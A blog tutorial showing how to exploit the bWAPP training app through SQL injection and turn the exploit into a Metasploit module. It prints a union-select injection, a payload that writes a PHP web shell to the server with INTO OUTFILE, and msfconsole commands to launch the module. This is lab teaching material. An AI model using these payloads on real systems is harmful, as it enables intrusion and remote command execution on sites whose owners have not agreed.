Hi little bees,
It worked ! But ... you already knew it ? ;)
In this article, I'll show you how you
can find an exploit in bWAPP and port it to a Metasploit module to
ease the exploitation of your loved bee-box (or any bWAPP aware box).
You probably all know the Mestasploit
Framework. If you don't know it yet, you should absolutely take a
look at its website and download/install it.
If you're using kali linux, Metasploit
is present in your beehive.
First,
we need a to find a valid exploit. For now, I'll take a basic sql
injection to spawn
a shell/meterpreter to the box.
I'm a
little lazy and basics of
sql injection are out of
scope, so if you don't' know how to exploit it
in bWAPP you can still
refer to my (killed in the
beehive) bwappexploited site.
So,
starting from the fact that this injection works fine
well to get the current database :
' and
1=0 union all select 1,2,database(),4,5,6,7 -- -
We
could abuse the SELECT INTO
OUTFILE mysql statement to write a php file, our backdoor, to the
webserver.
But
don't forget you're injecting mysql, so mysql or a group it belongs
to should have write perms on the folder where you want to write the
backdoor.
An
image or document folder is often a good choice as it is often used
to upload images through an admin web interface.
In
this case, the « images » folder is writable :)
(http://yourip/bWAPP/images/)
Our
payload
could be something like this:
a'
UNION SELECT 1, "<?php system($_GET['cmd']) ?>",1,1,1,1,1
INTO OUTFILE "/var/www/bWAPP/images/yabadooo.php"
-- -
Of
course, change the path if bWAPP is installed in another directory.
If
our injection worked , a file named yabadooo.php containing our
payload is present in the « images » folder, let's abuse
it with « id »
command to see which user serves our payload.
It worked ! But ... you already knew it ? ;)
To
build a metasploit module, you have to answer to this question :
Which steps were necessary to successfully
exploit ?
In
our case it's rather simple :
1 –
Login to bWAPP
2 –
Post evil parameters to inject1.php
Here's
the first step details:
As
you can see we first connect to bWAPP to store the session cookie,
then we use this cookie to login to the bWAPP.
Finally,
in the second step, we call the hive function to login then we send
the evil request
to get our shell.
Metasploit
generates the payload for us, just replace php commands in the sql
injection by « payload.encoded » and let MSF do its job.
The
big part of the job is done, you'll understand the meaning of it all
while reading, I let you explore the final script.
You'll
find the msf module here, just copy/paste it in MSF modules
folder.
Kali
users can drop it in
/usr/share/metasploit-framework/modules/exploits/multi/http/
.
Start
msfconsole and type :
>
use exploit/multi/http/bwapp-sqli
>
set RHOST <bWAPP IP ADDRESS>
>
exploit -j
And
magic happens :)
That's
all bees,
Thanks
for reading !
David
Bloom
Twitter :
@philophobia78
